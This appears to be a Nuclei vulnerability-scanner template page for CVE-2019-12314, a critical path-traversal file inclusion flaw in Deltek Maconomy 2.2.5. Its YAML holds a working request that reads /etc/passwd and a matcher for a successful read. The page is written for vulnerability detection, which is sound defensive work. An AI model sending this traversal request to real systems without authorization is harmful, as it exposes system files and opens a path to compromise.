Deltek Maconomy 2.2.5 - Local File Inclusion
ID: CVE-2019-12314
Severity: critical
Author: madrobot
Tags: cve,cve2019,lfi,packetstorm,deltek
Description
Section titled “Description”Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
YAML Source
Section titled “YAML Source”id: CVE-2019-12314
info: name: Deltek Maconomy 2.2.5 - Local File Inclusion author: madrobot severity: critical description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Deltek Maconomy 2.2.5. reference: - http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html - https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm - https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt - https://github.com/merlinepedra25/nuclei-templates - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 epss-score: 0.16359 epss-percentile: 0.95995 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: deltek product: maconomy tags: cve,cve2019,lfi,packetstorm,deltek
http: - method: GET path: - "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402202d758bd46f5ee5c6205b02c102c77a45c21494f484fbc28ce7fa07ee7160372402203d5d4ee8502e1ef16e649b3ce63c831d8f7bf365f71b3051b71de793a88d8191:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-12314.yaml"